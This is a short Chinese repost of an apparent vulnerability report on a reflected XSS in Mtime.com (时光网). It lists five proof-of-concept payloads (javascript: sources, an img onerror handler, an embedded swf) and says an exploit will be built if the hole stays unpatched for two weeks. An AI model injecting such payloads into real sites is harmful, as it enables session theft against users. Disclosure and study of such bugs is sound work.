特色栏目：服务器安全 Linux 批处理 Linux安全 Mysql Mssql Access 下载中心

时光网一处XSS 5种打法

来源：互联网作者：佚名时间：2015-07-07 06:42

漏洞的危害其实是因需求而异，对于一次精心的渗透而言或许一个反射xss就够了.没被干过的厂商也不懂那份痛了. 1.jpg poc1：INPUT SRC=javascript：alert(XSS); poc2：img src=# onerror=alert(XSS) poc3: IFRAME SRC=javascript：alert(XSS);/IFRAME poc4: EMB

漏洞的危害其实是因需求而异，对于一次精心的渗透而言或许一个反射xss就够了.没被干过的厂商也不懂那份痛了.

1.jpg

poc1：<INPUT SRC="javascript：alert('XSS');">

poc2：<img src='#' onerror='alert("XSS")'>

poc3: <IFRAME SRC="javascript：alert('XSS');"></IFRAME>

poc4: <EMBED SRC="http://wooyun.org/xss.swf" ></EMBED>

poc5: <A href=http://www.google.com/>link</A>

等2周看看，没补再构造利用.

修复方案：

攻城师懂

上一篇：[别信任cookie!]SQL注入与网站定向爆破全过程
下一篇：GISOFT.GCMS上传漏洞及修复

时光网一处XSS 5种打法

相关文章